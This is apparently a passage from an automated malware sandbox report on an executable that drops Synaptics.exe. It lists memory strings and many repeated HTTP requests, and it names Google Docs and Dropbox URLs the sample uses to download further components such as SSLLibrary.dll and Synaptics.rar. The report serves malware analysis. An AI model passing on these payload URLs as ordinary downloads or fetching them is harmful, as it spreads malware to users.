                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadull-Versb
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwR
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwd
                              Source: Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000002.00000000.408126624.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500942768.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx.
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxg
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxl
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady)
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyE
                              Source: Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyoE
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadys
                              Source: Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz(
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: Synaptics.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000002.00000002.515381487.0000000017EFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.514799201.0000000016D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.514836974.0000000016EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.514965988.000000001727E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.505250947.000000000A96E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.514881538.0000000016FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515616570.000000001867E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515302965.0000000017C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515508759.00000000182BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.514931146.000000001713E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515426953.000000001803E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515472088.000000001817E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515542470.00000000183FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515582325.000000001853E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515338061.0000000017DBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515262410.0000000017B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.515712502.00000000187BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.comuc?id=0BxsMXGfPIZfSVlVsOGlEVGxuVk&expo
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.dr, ._cache_A1FsbRkm5m.exe.0.drString found in binary or memory: https://hao.360.cnhttps://http://https://hao.360.cn/?installerhttps://hao.360.cn/%d%s
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
                              Source: Synaptics.exe.0.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
                              Source: A1FsbRkm5m.exe, 00000000.00000003.281143563.00000000024E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: Synaptics.exe.0.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: Synaptics.exe.0.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000002.00000002.499502598.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.376020252.00000000022B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.405983396.00000000022B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/03
                              Source: A1FsbRkm5m.exe, Synaptics.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/06
                              Source: unknownDNS traffic detected: queries for: s.360.cn
                              Source: C:\Users\user\Desktop\._cache_A1FsbRkm5m.exeCode function: 1_2_00CC6430 URLDownloadToFileW,_memset,URLDownloadToCacheFileW,DeleteFileW,1_2_00CC6430
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
